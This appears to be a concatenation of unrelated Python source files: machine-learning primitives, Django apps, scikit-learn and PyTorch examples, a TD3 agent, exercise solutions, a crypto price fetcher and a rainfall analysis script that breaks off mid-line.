result_df.metadata = result_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, len(result_df.columns) - 1),
"https://metadata.datadrivendiscovery.org/types/PredictedTarget",
)
logger.debug(f"\n{result_df}")
return base.CallResult(result_df)
def produce_feature_importances(
self,
*,
inputs: container.DataFrame,
timeout: float = None,
iterations: int = None,
) -> CallResult[container.DataFrame]:
logger.debug(f"Producing {__name__} feature weights")
# force a fit it hasn't yet been done
if self._needs_fit:
self.fit()
# extract the feature weights
output = container.DataFrame(
self._model.feature_importances().reshape((1, len(inputs.columns))),
generate_metadata=True,
)
output.columns = inputs.columns
for i in range(len(inputs.columns)):
output.metadata = output.metadata.update_column(
i, {"name": output.columns[i]}
)
# map component columns back to their source - this would cover things like
# a one hot encoding column, that is derived from some original source column
source_col_importances: Dict[str, float] = {}
for col_idx in range(0, len(output.columns)):
col_dict = dict(
inputs.metadata.query((metadata_base.ALL_ELEMENTS, col_idx))
)
# if a column points back to a source column, add that columns importance to the
# total for that source column
if "source_column" in col_dict:
source_col = col_dict["source_column"]
if source_col not in source_col_importances:
source_col_importances[source_col] = 0.0
source_col_importances[source_col] += output.iloc[:, col_idx]
for source_col, importance in source_col_importances.items():
# add the source columns and their importances to the returned data
output_col_length = len(output.columns)
output.insert(output_col_length, source_col, importance, True)
output.metadata = output.metadata.update_column(
output_col_length, {"name": source_col}
)
return CallResult(output)
def produce_shap_values(
self,
*,
inputs: container.DataFrame,
timeout: float = None,
iterations: int = None,
) -> CallResult[container.DataFrame]:
if self._needs_fit:
self.fit()
# don't want to produce SHAP predictions on train set because too computationally intensive
check_rows = min(self._input_hash.shape[0], inputs.shape[0])
if (
pd.util.hash_pandas_object(inputs.head(check_rows))
== self._input_hash.head(check_rows)
).all():
logger.info(
"Not producing SHAP interpretations on train set because of computational considerations"
)
return CallResult(container.DataFrame([]))
# drop any non-numeric columns
num_cols = inputs.shape[1]
inputs = inputs.select_dtypes(include="number")
col_diff = num_cols - inputs.shape[1]
if col_diff > 0:
logger.warn(f"Removed {col_diff} unencoded columns.")
explainer = shap.TreeExplainer(self._model._models[0].model)
max_size = self.hyperparams["shap_max_dataset_size"]
if inputs.shape[0] > max_size:
logger.warning(
f"There are more than {max_size} rows in dataset, sub-sampling ~{max_size} approximately representative rows "
+ "on which to produce interpretations"
)
df = self._shap_sub_sample(inputs)
shap_values = explainer.shap_values(df)
else:
shap_values = explainer.shap_values(pd.DataFrame(inputs))
if self._model.mode == "classification":
logger.info(
f"Returning interpretability values offset from most frequent class in dataset"
)
shap_values = shap_values[np.argmax(explainer.expected_value)]
output_df = container.DataFrame(shap_values, generate_metadata=True)
for i, col in enumerate(inputs.columns):
output_df.metadata = output_df.metadata.update_column(i, {"name": col})
component_cols: Dict[str, List[int]] = {}
for c in range(0, len(output_df.columns)):
col_dict = dict(inputs.metadata.query((metadata_base.ALL_ELEMENTS, c)))
if "source_column" in col_dict:
src = col_dict["source_column"]
if src not in component_cols:
component_cols[src] = []
component_cols[src].append(c)
# build the source column values and add them to the output
for s, cc in component_cols.items():
src_col = output_df.iloc[:, cc].apply(lambda x: sum(x), axis=1)
src_col_index = len(output_df.columns)
output_df.insert(src_col_index, s, src_col)
output_df.metadata = output_df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, src_col_index),
"https://metadata.datadrivendiscovery.org/types/Attribute",
)
df_dict = dict(output_df.metadata.query((metadata_base.ALL_ELEMENTS,)))
df_dict_1 = dict(output_df.metadata.query((metadata_base.ALL_ELEMENTS,)))
df_dict["dimension"] = df_dict_1
df_dict_1["name"] = "columns"
df_dict_1["semantic_types"] = (
"https://metadata.datadrivendiscovery.org/types/TabularColumn",
)
df_dict_1["length"] = len(output_df.columns)
output_df.metadata = output_df.metadata.update(
(metadata_base.ALL_ELEMENTS,), df_dict
)
return CallResult(output_df)
def _shap_sub_sample(self, inputs: container.DataFrame):
df = pd.DataFrame(inputs)
df["cluster_assignment"] = (
KMeans(random_state=self.random_seed).fit_predict(df).astype(int)
)
n_classes = df["cluster_assignment"].unique()
# deal with cases in which the predictions are all one class
if len(n_classes) == 1:
return df.sample(self.hyperparams["shap_max_dataset_size"]).drop(
columns=["cluster_assignment"]
)
else:
proportion = round(
self.hyperparams["shap_max_dataset_size"] / len(n_classes)
)
dfs = []
for i in n_classes:
# dealing with classes that have less than or equal to their proportional representation
if df[df["cluster_assignment"] == i].shape[0] <= proportion:
dfs.append(df[df["cluster_assignment"] == i])
else:
dfs.append(
df[df["cluster_assignment"] == i].sample(
proportion, random_state=self.random_seed
)
)
sub_sample_df = pd.concat(dfs)
return sub_sample_df.drop(columns=["cluster_assignment"])
def get_params(self) -> Params:
return Params(
model=self._model,
target_cols=self._target_cols,
label_map=self._label_map,
needs_fit=self._needs_fit,
input_hash=self._input_hash,
binary=self._binary,
)
def set_params(self, *, params: Params) -> None:
self._model = params["model"]
self._target_cols = params["target_cols"]
self._label_map = params["label_map"]
self._needs_fit = params["needs_fit"]
self._input_hash = params["input_hash"]
self._binary = params["binary"]
return
|
from rubicon_ml import domain
from rubicon_ml.client import Dataframe
def test_properties(project_client):
parent = project_client
domain_dataframe = domain.Dataframe(
description="some description", tags=["x"], name="test title"
)
dataframe = Dataframe(domain_dataframe, parent)
assert dataframe.id == domain_dataframe.id
assert dataframe.name == domain_dataframe.name
assert dataframe.description == domain_dataframe.description
assert dataframe.tags == domain_dataframe.tags
assert dataframe.created_at == domain_dataframe.created_at
assert dataframe.parent == parent
def test_get_data(project_client, test_dataframe):
parent = project_client
df = test_dataframe
logged_df = parent.log_dataframe(df)
assert logged_df.get_data().compute().equals(df.compute())
|
#!/usr/bin/env python
import sys
import os
import os.path as osp
import numpy as np
from random import randrange, choice
import json
from capsul.api import get_process_instance
# Make sure that python directory is in sys.path
python = osp.join(osp.dirname(osp.dirname(sys.argv[0])), 'python')
if python not in sys.path:
sys.path.append(python)
array_size = (10, 10)
subjects = ['evie', 'claud', 'bulah', 'letta', 'irvine', 'len', 'jay',
'verne', 'brain', 'walton', 'audrey', 'terrill', 'alden',
'madie', 'fallon', 'rohan', 'bryanna', 'eloise', 'brenton',
'nanie', 'dominiqu', 'claudio', 'garland', 'bridie', 'claribel',
'kathlyn', 'trenton', 'el', 'hortenci', 'latonia', 'jacoby',
'destinee', 'genoveva', 'britni', 'paulene', 'elvera', 'yoshiko',
'wellingt', 'dane', 'maximino', 'deana', 'faron', 'frederic',
'billye', 'donovan', 'thora', 'sussie', 'elouise', 'nadia',
'eboni', 'lucero', 'jere', 'giselle', 'mossie', 'chastity',
'harold', 'dandre', 'robby', 'tammy', 'nils', 'darrien', 'leisa',
'webster', 'leroy', 'alexis', 'trevor', 'exie', 'rayshawn',
'edsel', 'hampton', 'lawson', 'mozella', 'isabella', 'leilani',
'lovie', 'waldo', 'donte', 'delpha', 'pamela', 'tyrel', 'dillard',
'mannie', 'amelia', 'misti', 'lorelei', 'clara', 'maymie',
'derrell', 'cooper', 'latoya', 'aliyah', 'merlene', 'dequan',
'lissa', 'domenica', 'gerald', 'melville', 'glendon', 'garland',
'alycia']
group_names = ['sinusoidally', 'enfold', 'helmholtzian', 'anacardium', 'amyelencephalic']
center_names = ['lasagna', 'ruby', 'compter']
output_dir = sys.argv[1]
# Create groups
groups = {}
group_size = len(subjects)/len(group_names)
for i in range(len(group_names)):
groups[group_names[i]] = subjects[i*group_size : (i+1)*group_size]
del group_names
del i
# Generate one random template mask per group
for group in groups:
mask = np.zeros(array_size)
xmin = randrange(array_size[0])
xmax = randrange(xmin,array_size[0])
ymin = randrange(array_size[1])
ymax = randrange(ymin,array_size[1])
mask[xmin:xmax, ymin:ymax] = 1
mask_json = {
'group_name': group,
'group_subjects': groups[group],
}
mask_dir = osp.join(output_dir, 'share', 'template_masks')
if not osp.exists(mask_dir):
os.makedirs(mask_dir)
mask_file = osp.join(mask_dir, '%s.npy' % group)
np.save(mask_file, mask)
json_file = osp.join(mask_dir, '%s.json' % group)
json.dump(mask_json, open(json_file,'w'))
# Generate one data file per subject
center_per_subject = {}
for subject in subjects:
array = np.random.random(array_size)
center = choice(center_names)
center_per_subject[subject] = center
subject_json = dict(
subject_code=subject,
center_code=center)
file = '{output}/database/random_matrix/{center}/{subject}/{subject}'.format(output=output_dir,
center=center,
subject=subject)
dir = osp.dirname(file)
if not osp.exists(dir):
os.makedirs(dir)
np.save(file + '.npy', array)
json.dump(mask_json, open(file + '.json','w'))
# Generate results
for group in groups:
subjects = groups[group]
input_files = ['{output}/database/random_matrix/{center}/{subject}/{subject}.npy'.format(output=output_dir,
center=center_per_subject[subject],
subject=subject)
for subject in subjects]
template_mask = '{output}/share/template_masks/{group}.npy'.format(output=output_dir,
group=group)
threshold = 0.5
averages_sup = ['{output}/database/group_average/{center}/{subject}/{subject}_avg_sup.npy'.format(output=output_dir,
center=center_per_subject[subject],
subject=subject)
for subject in subjects]
averages_inf = ['{output}/database/group_average/{center}/{subject}/{subject}_avg_inf.npy'.format(output=output_dir,
center=center_per_subject[subject],
subject=subject)
for subject in subjects]
group_average_sup = '{output}/database/group_average/{group}_sup.npy'.format(output=output_dir,
group=group)
group_average_inf = '{output}/database/group_average/{group}_inf.npy'.format(output=output_dir,
group=group)
pipeline = get_process_instance('bv_capsul_ex.ex_processes.GroupAveragePipeline',
input_files=input_files,
template_mask = template_mask,
threshold=threshold,
averages_sup=averages_sup,
averages_inf=averages_inf,
group_average_sup=group_average_sup,
group_average_inf=group_average_inf)
print 'Running group pipeline for group', group
pipeline.run()
|
from django.shortcuts import render_to_response
from django.template import RequestContext
def e_handler404(request):
context = RequestContext(request)
response = render_to_response('404.html', context.flatten(0))
response.status_code = 404
return response
|
# -*- encoding: ms949 -*-
from sklearn.model_selection import LeaveOneOut
from sklearn.model_selection import cross_val_score
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
iris = load_iris()
logreg = LogisticRegression()
loo = LeaveOneOut()
scores = cross_val_score(logreg, iris.data, iris.target, cv=loo)
print("cv spilt count: ", len(scores)) #교차 검증 분할 횟수
print("mean of accuracy: {:.2f}".format(scores.mean()))
|
# Generated by Django 3.2.6 on 2021-08-21 15:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('nostaldja', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='fad',
old_name='img_url',
new_name='image_url',
),
]
|
from objectBase import ObjectBase
class Lane(ObjectBase):
def __init__(self, id_=None, parent_object=None, lights=None):
super().__init__(id_=id_, parent_object=parent_object)
self.queue = []
self.lights = lights
def is_incoming(self):
return (False if self.outgoing else True)
def add_to_queue(self, object_):
"""Method adds object (car) to queue"""
self.queue.append(object_)
def get_first_car(self):
"""Method returns first car from queue or None if not available."""
try:
car = self.queue[0]
return car
except IndexError:
return None
def get_lights(self):
"""Method returns traffic lights for current lane"""
return self.lights
def get_queue(self):
"""Method returns all cars currently awaiting in queue"""
return self.queue
def remove_first_car(self):
"""Method removes and returns first car from queue or None if not available."""
try:
car = self.queue.pop(0)
return car
except IndexError:
return None
|
from django.shortcuts import render
from .models import job
def home(request):
Job = job.objects
return render(request,'jobs/home.html',{"Job":Job})
def app(request):
return render(request,'jobs/app.html')
|
# RachelPotter.py
# A program that changes the lowercase names in a .txt file to uppercase and prints them to a new file
def main():
infile_name = "Before.txt"
outfile_name = "After.txt"
infile = open(infile_name, "r")
outfile = open(outfile_name, "w")
for row in infile:
for letter in row:
cap_name = letter.capitalize()
print(cap_name, end="", file=outfile)
infile.close()
outfile.close()
print("Capitalized names have been written to:", outfile_name)
main()
# I pledge my honor that I have abided by the Stevens Honor System
# Rachel Potter
|
from django.db import models
from django.contrib.auth.models import User
from products.models import Products
CHAT_TYPES = (
(0, 'pending'),
(1, 'sent')
)
class Order(models.Model):
user = models.ForeignKey(User)
# shopping_address
city = models.CharField(
max_length=20)
phone = models.CharField(
max_length=15)
contry = models.CharField(
max_length=20)
amount = models.FloatField()
created_at = models.DateTimeField()
status = models.IntegerField(choices=CHAT_TYPES)
def __unicode__(self):
return self.user.first_name
class OrderToProduct(models.Model):
order = models.ForeignKey(Order)
product = models.ForeignKey(Products)
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
import math
from torch.autograd import Variable
import torch.utils.model_zoo as model_zoo
class input_data(object):
def __init__(self, G):
self.onehot # Tensor (num_nodes*input_dim) one hot from dict
self.index1 # Long Tensor (num_pairs) (source) self.index2 # Long Tensor (num_pairs) (target)
self.mat # Tensor for index add (num_nodes * num_pairs)
class ForwardBlock(nn.Module):
def __init__(self, input_dim, output_dim, nLayers=2, bias=False):
super(ForwardBlock, self).__init__()
self.linear = nn.ModuleList()
self.bn = nn.ModuleList()
self.relu = nn.ModuleList()
self.nLayers = nLayers
for i in range(nLayers):
if i == 0: l = input_dim
else: l = output_dim
self.linear.append(nn.Linear(l, output_dim, bias))
self.bn.append(nn.BatchNorm1d(output_dim))
self.relu.append(nn.ReLU(inplace=True))
init.kaiming_normal(self.linear[-1].weight)
def forward(self, x):
for i in range(self.nLayers):
x = self.linear[i](x)
x = self.bn[i](x)
x = self.relu[i](x)
return x
class FullyConnectedNet(nn.Module):
def __init__(self, *layers):
'''
layers : list of int
There are dimensions in the sequence
'''
super(FullyConnectedNet, self).__init__()
self.linear = nn.ModuleList()
self.bn = nn.ModuleList()
self.relu = nn.ModuleList()
pre_dim = layers[0]
self.nLayers = 0
for dim in layers[1:]:
self.linear.append(nn.Linear(pre_dim, dim, bias=False))
self.bn.append(nn.BatchNorm1d(dim))
self.relu.append(nn.ReLU(inplace=True))
init.kaiming_normal(self.linear[-1].weight)
self.nLayers += 1
pre_dim = dim
def forward(self, x):
for i in range(self.nLayers):
x = self.linear[i](x)
x = self.bn[i](x)
x = self.relu[i](x)
return x
def maxpoolcat(x1, x2):
x1 = x1.max(0)[0]
x2 = x2.max(0)[0]
x = torch.cat((x1, x2), 1) #TODO Jan -- axis was 1 instead of 0
return x
def concat_em_uc(stmt, conj):
stmt = stmt.max(0)[0]
conj = conj.max(0)[0]
cov = stmt * conj
x = torch.cat((cov, conj), 1)
return x
def em(stmt, conj):
stmt = stmt.max(0)[0]
conj = conj.max(0)[0]
cov = stmt * conj
return cov
def dot_max(x1, x2):
return torch.mm(x1, x2.t()).max()
def dot_mean(x1, x2):
return torch.mm(x1, x2.t()).mean()
def meanpoolcat(x1, x2):
x1 = x1.mean(0)
x2 = x2.mean(0)
x = torch.cat((x1, x2), 1)
return x
def maxpoolpair(conj, stmt):
conj = conj.max(0)[0]
conj = conj.repeat(stmt.size()[0], 1)
return torch.cat((conj, stmt), 1)
class GraphNet(nn.Module):
def __init__(self,
input_dim,
nFeats,
nLayers,
block='normal',
depth=2,
bias=False,
short_cut=False,
direction=False,
loss=None,
binary=False,
no_step_supervision=False,
tied_weight=False,
compatible=False): # compatible is used to run old model
super(GraphNet, self).__init__()
self.no_step_supervision = no_step_supervision
self.input_dim = input_dim
self.nFeats = nFeats
self.nLayers = nLayers
self.step = nn.ModuleList()
self.relu = nn.ReLU(inplace=True)
if compatible:
self.l1 = nn.Linear(input_dim, nFeats, bias=False)
else:
self.l1 = nn.Embedding(input_dim, nFeats, sparse=False)
init.kaiming_normal(self.l1.weight)
self.l2 = nn.ModuleList()
self.bn = nn.BatchNorm1d(nFeats)
self.short_cut = short_cut
self.direction = direction
self.binary = binary
if loss == 'pair':
self.pair_forward = PairForward(2 * nFeats, nFeats, nFeats // 2,
nFeats // 2)
if self.direction or self.binary:
self.step_out = nn.ModuleList()
if self.binary:
self.step_binary = nn.ModuleList()
self.tied_weight = tied_weight
if tied_weight:
self.step = block_dict[block](nFeats * 2, nFeats, depth, bias)
if self.direction or self.binary:
self.step_out = block_dict[block](nFeats * 2, nFeats, depth, bias)
if self.binary:
self.step_binary = block_dict[block](nFeats*3, nFeats*3, depth, bias)
if short_cut:
self.l2 = block_dict[block](nFeats, nFeats, 1 , bias)
else:
for i in range(nLayers):
self.step.append(block_dict[block](nFeats * 2, nFeats, depth, bias))
if self.direction or self.binary:
self.step_out.append(
block_dict[block](nFeats * 2, nFeats, depth, bias))
if self.binary:
self.step_binary.append(block_dict[block](nFeats*3, nFeats*3, depth, bias))
if short_cut and i < nLayers-1:
self.l2.append(block_dict[block](nFeats, nFeats, 1 , bias))
def forward(self, data, conj=None):
# [onehot , index1 , index2 , mat]
# if self.direction == true:
# [onehot, iindex1, iindex2, imat, oindex1, oindex2, omat]
#print (len(data))
x = self.l1(data[0])
x = self.bn(x)
x = self.relu(x)
if self.no_step_supervision:
out = None
else:
out = [x]
if self.tied_weight:
for i in range(self.nLayers):
if conj is not None:
z = torch.cat((x, conj), 0)
else:
z = x
y = self.step(torch.cat((z[data[1]], z[data[2]]), 1))
z = torch.mm(data[3], y)
if self.direction or self.binary:
y_out = self.step_out(torch.cat((x[data[4]], x[data[5]]), 1))
z_out = torch.mm(data[6], y_out)
z = z + z_out
if self.binary and data[7].size()[0] > 1:
y_bi = self.step_binary(torch.cat( (x[data[7][0] ], x[data[7][1] ], x[data[7][2] ]) , 1))
z_bi = torch.mm(data[8], y_bi.view(-1 , self.nFeats))
z = z + z_bi
if self.no_step_supervision:
out = [z]
else:
out.append(z)
if self.short_cut and i < self.nLayers-1:
x = x + z
x = self.l2(x)
else:
x = z
else:
for i in range(self.nLayers):
if conj is not None:
z = torch.cat((x, conj), 0)
else:
z = x
y = self.step[i](torch.cat((z[data[1]], z[data[2]]), 1))
z = torch.mm(data[3], y)
if self.direction or self.binary:
y_out = self.step_out[i](torch.cat((x[data[4]], x[data[5]]), 1))
z_out = torch.mm(data[6], y_out)
z = z + z_out
if self.binary and data[7].size()[0] > 1:
y_bi = self.step_binary[i](torch.cat( (x[data[7][0] ], x[data[7][1] ], x[data[7][2] ]) , 1))
z_bi = torch.mm(data[8], y_bi.view(-1 , self.nFeats))
z = z + z_bi
if self.no_step_supervision:
out = [z]
else:
out.append(z)
if self.short_cut and i < self.nLayers-1:
x = x + z
x = self.l2[i](x)
else:
x = z
return out
class PairForward(nn.Module):
def __init__(self, nFeats_in, nFeats1, nFeats2, nFeats_out, bias=False):
super(PairForward, self).__init__()
self.l1 = nn.Linear(nFeats_in, nFeats1, bias=bias)
init.kaiming_normal(self.l1.weight)
self.bn1 = nn.BatchNorm1d(nFeats1)
self.relu1 = nn.ReLU(inplace=True)
self.l2 = nn.Linear(nFeats1, nFeats2, bias=bias)
init.kaiming_normal(self.l2.weight)
self.bn2 = nn.BatchNorm1d(nFeats2)
self.relu2 = nn.ReLU(inplace=True)
self.l3 = nn.Linear(nFeats2, nFeats_out, bias=bias)
init.kaiming_normal(self.l3.weight)
self.bn3 = nn.BatchNorm1d(nFeats_out)
self.relu3 = nn.ReLU(inplace=True)
def forward(self, data):
x = self.l1(data)
x = self.bn1(x)
x = self.relu1(x)
x = self.l2(x)
x = self.bn2(x)
x = self.relu2(x)
x = self.l3(x)
x = self.bn3(x)
x = self.relu3(x)
return x.max(0)[0]
block_dict = {'normal': ForwardBlock}
|
import numpy as np
import torch
import gym
import torch.nn.functional as F
from termcolor import cprint
from flare.qpolgrad import BaseQPolicyGradient
import flare.kindling as fk
from flare.kindling import ReplayBuffer
from typing import Optional, Union, Callable
from itertools import chain
class TD3(BaseQPolicyGradient):
def __init__(
self,
env_fn: Callable,
actorcritic: Callable = fk.FireTD3ActorCritic,
seed: Optional[int] = 0,
steps_per_epoch: Optional[int] = 4000,
replay_size: Optional[int] = int(1e6),
gamma: Optional[float] = 0.99,
polyak: Optional[float] = 0.95,
pol_lr: Optional[float] = 1e-3,
q_lr: Optional[float] = 1e-3,
hidden_sizes: Optional[Union[tuple, list]] = (256, 128),
bs: Optional[int] = 100,
warmup_steps: Optional[int] = 10000,
update_after: Optional[int] = 1000,
update_every: Optional[int] = 50,
act_noise: Optional[float] = 0.1,
noise_clip: Optional[float] = 0.5,
policy_delay: Optional[int] = 2,
target_noise: Optional[float] = 0.2,
buffer: Optional[float] = ReplayBuffer,
save_freq: Optional[int] = 1,
state_preproc: Optional[Callable] = None,
state_sze: Optional[Union[int, tuple]] = None,
logger_dir: Optional[str] = None,
tensorboard: Optional[bool] = True,
save_states: Optional[bool] = False,
save_screen: Optional[bool] = False,
):
super().__init__(
env_fn,
actorcritic,
seed=seed,
steps_per_epoch=steps_per_epoch,
replay_size=replay_size,
gamma=gamma,
polyak=polyak,
pol_lr=pol_lr,
q_lr=q_lr,
hidden_sizes=hidden_sizes,
bs=bs,
warmup_steps=warmup_steps,
update_after=update_after,
update_every=update_every,
act_noise=act_noise,
save_freq=save_freq,
buffer=buffer,
state_preproc=state_preproc,
state_sze=state_sze,
logger_dir=logger_dir,
tensorboard=tensorboard,
save_states=save_states,
save_screen=save_screen,
)
self.target_noise = target_noise
self.noise_clip = noise_clip
self.policy_delay = policy_delay
def setup_optimizers(self, pol_lr, q_lr):
self.policy_optimizer = torch.optim.Adam(self.ac.policy.parameters(), lr=pol_lr)
self.q_params = chain(self.ac.qfunc1.parameters(), self.ac.qfunc2.parameters())
self.q_optimizer = torch.optim.Adam(self.q_params, lr=q_lr)
def calc_policy_loss(self, data):
o = data["obs"]
q1_pi = self.ac.qfunc1(o, self.ac.policy(o))
return -q1_pi.mean()
def calc_qfunc_loss(self, data):
o, a, r, o2, d = (
data["obs"],
data["act"],
data["rew"],
data["obs2"],
data["done"],
)
q1 = self.ac.qfunc1(o, a)
q2 = self.ac.qfunc2(o, a)
# Bellman backup for Q functions
with torch.no_grad():
pi_targ = self.ac_targ.policy(o2)
# Target policy smoothing
epsilon = torch.randn_like(pi_targ) * self.target_noise
epsilon = torch.clamp(epsilon, -self.noise_clip, self.noise_clip)
a2 = pi_targ + epsilon
a2 = torch.clamp(a2, -self.act_limit, self.act_limit)
# Target Q-values
q1_pi_targ = self.ac_targ.qfunc1(o2, a2)
q2_pi_targ = self.ac_targ.qfunc2(o2, a2)
q_pi_targ = torch.min(q1_pi_targ, q2_pi_targ)
backup = r + self.gamma * (1 - d) * q_pi_targ
# MSE loss against Bellman backup
loss_q1 = ((q1 - backup) ** 2).mean()
loss_q2 = ((q2 - backup) ** 2).mean()
loss_q = loss_q1 + loss_q2
# Useful info for logging
loss_info = dict(Q1Values=q1.detach().numpy(), Q2Values=q2.detach().numpy())
return loss_q, loss_info
def update(self, data, timer):
# First run one gradient descent step for Q1 and Q2
self.q_optimizer.zero_grad()
loss_q, loss_info = self.calc_qfunc_loss(data)
loss_q.backward()
self.q_optimizer.step()
# Record things
self.logger.store(QLoss=loss_q.item(), **loss_info)
# Possibly update pi and target networks
if timer % self.policy_delay == 0:
# Freeze Q-networks so you don't waste computational effort
# computing gradients for them during the policy learning step.
for p in self.q_params:
p.requires_grad = False
# Next run one gradient descent step for pi.
self.policy_optimizer.zero_grad()
loss_pi = self.calc_policy_loss(data)
loss_pi.backward()
self.policy_optimizer.step()
# Unfreeze Q-networks so you can optimize it at next DDPG step.
for p in self.q_params:
p.requires_grad = True
# Record things
self.logger.store(PolicyLoss=loss_pi.item())
# Finally, update target networks by polyak averaging.
with torch.no_grad():
for p, p_targ in zip(self.ac.parameters(), self.ac_targ.parameters()):
# NB: We use an in-place operations "mul_", "add_" to update target
# params, as opposed to "mul" and "add", which would make new tensors.
p_targ.data.mul_(self.polyak)
p_targ.data.add_((1 - self.polyak) * p.data)
def logger_tabular_to_dump(self):
self.logger.log_tabular("Q1Values", with_min_and_max=True)
self.logger.log_tabular("Q2Values", with_min_and_max=True)
self.logger.log_tabular("PolicyLoss", average_only=True)
self.logger.log_tabular("QLoss", average_only=True)
|
# -*- encoding: ms949 -*-
import numpy as np
import matplotlib.pylab as plt
rnd = np.random.RandomState(0)
X_org = rnd.normal(size=(1000, 3))
w = rnd.normal(size=3)
X = rnd.poisson(10 * np.exp(X_org))
y = np.dot(X_org, w)
print(X[:10, 0])
print("feature count:\n{}".format(
np.bincount(X[:, 0].astype('int'))))
plt.xlim(0, 160)
plt.ylim(0, 70)
bins = np.bincount(X[:, 0])
plt.bar(range(len(bins)), bins, color='grey')
plt.ylabel("count") #출현회수
plt.xlabel("value") #값
plt.show()
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
score = Ridge().fit(X_train, y_train).score(X_test, y_test)
print("test score: {:.3f}".format(score))
#log scale
X_train_log = np.log(X_train + 1)
X_test_log = np.log(X_test + 1)
plt.hist(X_train_log[:,0], bins=25, color='gray')
plt.ylabel("count")
plt.xlabel("value")
plt.show()
score = Ridge().fit(X_train_log, y_train).score(X_test_log, y_test)
print("test score:{:.3f}".format(score))
|
# Problem name: Increasing Array
# Description: You are given an array of n integers.
# You want to modify the array so that it is increasing, i.e., every element is at least as large as the previous element.
# On each turn, you may increase the value of any element by one. What is the minimum number of turns required?
# Strategy:check from index 1 , whether it is greater than or equal to its previous element,
# if not, then find the difference and increase the count value by the difference , also, do not forget to make changes in the original list
l=int(input())
li=list(map(int,input().split()))
count=0
for i in range(1,l):
if(li[i]>=li[i-1]):
continue
else:
m=li[i-1]-li[i]
count+=m
li[i]+=m
print(count)
|
class Solution:
# @param A : tuple of integers
# @return an integer
def longestSubsequenceLength(self, A):
inc = [1] * len(A)
dec = inc[:]
for i in range(1, len(A)):
for j in range(0, i):
if A[j] < A[i]:
inc[i] = max(inc[i], inc[j] + 1)
for i in range(len(A) - 2, -1, -1):
for j in range(len(A) - 1, i, -1):
if A[j] < A[i]:
dec[i] = max(dec[i], dec[j] + 1)
longest = 0
for i in range(len(A)):
longest = max(longest, inc[i] + dec[i] - 1)
return longest
|
import requests
from django.db import models
from sources.models import CryptoExchange
class Cryptocurrency(models.Model):
base = models.CharField(max_length=10)
quote = models.CharField(max_length=10)
symbol = models.CharField(max_length=20)
exchange = models.ForeignKey(CryptoExchange, on_delete=models.CASCADE,)
bid = models.FloatField(default = None, null = True)
ask = models.FloatField(default = None, null = True)
last = models.FloatField(default = None, null = True)
base_volume = models.FloatField(default = None, null = True)
quote_volume = models.FloatField(default = None, null = True)
last_updated = models.DateTimeField(default = None, null = True)
def __str__(self):
return self.base + self.quote
def update_data(self):
ticker_data = requests.get('https://api.hitbtc.com/api/2/public/ticker/' + self.symbol.upper()).json()
self.bid = float(ticker_data["bid"])
self.ask = float(ticker_data["ask"])
self.last = float(ticker_data["last"])
self.base_volume = float(ticker_data["volume"])
self.quote_volume = float(ticker_data["volumeQuote"])
self.save()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 15 11:54:26 2018
@author: ian
"""
import calendar
import datetime as dt
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
from scipy.stats import linregress
import pdb
def get_date_from_multi_index(idx):
return [dt.date(idx.get_level_values(0)[i], idx.get_level_values(1)[i], 1)
for i in xrange(len(idx))]
def get_date_from_dataframe_vars(df):
return [dt.date(df.Year[i], df.Month[i], df.Day[i])
for i in xrange(len(df))]
path = '/home/ian/Dropbox/Work/Manuscripts/Writing/Gatum+_respiration/Data'
id_dict = {'Gatum': '089043', 'Cavendish': '089009'}
f_list = filter(lambda x: 'Data' in x, os.listdir(path))
paths_dict = {key: os.path.join(path, [x for x in f_list if id_dict[key] in x][0])
for key in id_dict}
df_list = []
for name in paths_dict:
df = pd.read_csv(paths_dict[name])
df.index = get_date_from_dataframe_vars(df)
df = df[['Rainfall amount (millimetres)', 'Quality']]
df.columns = ['{}_rainfall_mm'.format(name), '{}_Quality'.format(name)]
df_list.append(df)
begin_date = max([df.index[0] for df in df_list])
end_date = max([df.index[-1] for df in df_list])
new_index = pd.date_range(begin_date, end_date, freq = 'D')
combined_df = pd.concat([df.reindex(new_index) for df in df_list], axis = 1)
month_df = combined_df.dropna().groupby([lambda x: x.year,
lambda y: y. month]).sum()
params = linregress(month_df['Cavendish_rainfall_mm'],
month_df['Gatum_rainfall_mm'])
combined_df.loc[np.isnan(combined_df.Gatum_rainfall_mm),
'Gatum_rainfall_mm'] = (combined_df['Cavendish_rainfall_mm'] *
params.slope + params.intercept)
combined_s = combined_df.loc[~((combined_df.index.month==2) &
(combined_df.index.day==29)), 'Gatum_rainfall_mm']
compare_df = pd.DataFrame({'Long-term mean':
combined_s.groupby([lambda x: x.dayofyear]).mean()[:-1]})
year_list = ['2015', '2016', '2017', '2018']
for year in year_list:
temp_s = combined_s.loc[year]
temp_s.index = compare_df.index
compare_df[year] = temp_s
sums_df = compare_df.sum().round(1)
fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, figsize = (12, 12))
fig.patch.set_facecolor('white')
month_locs = np.cumsum([1] + map(lambda x: calendar.monthrange(2015, x)[1],
np.arange(1,12,1)))
month_labels = map(lambda x: calendar.month_name[x][0], np.arange(1,13,1))
xlim = [1, 365]
ylim = [0, round(compare_df[['2015', '2016', '2017', '2018']].max().max() * 1.05)]
yblim = [0, 1100]
d = {'2015': ax1, '2016': ax2, '2017': ax3, '2018': ax4}
for i, year in sorted(enumerate(d.keys())):
ax = d[year]
if i < 2:
ax.set_ylabel('Daily precipitation (mm)')
ax.set_xlim(xlim)
ax.set_ylim(ylim)
ax.set_xticks(month_locs)
ax.set_xticklabels(month_labels)
ax_b = ax.twinx()
if i >= 2:
ax_b.set_ylabel('Cumulative precipitation (mm)')
ax_b.set_ylim(yblim)
ax_b.fill_between(compare_df.index, np.tile(0, len(compare_df)),
compare_df['Long-term mean'].cumsum(),
alpha = 0.3, color = 'grey')
ax.bar(compare_df.index, compare_df[year], color = 'black')
ax_b.plot(compare_df.index, compare_df[year].cumsum().interpolate(),
color = 'black')
text = '{}mm'.format(str(sums_df.loc[year]))
ax.text(0.08, 0.9, year, horizontalalignment = 'left',
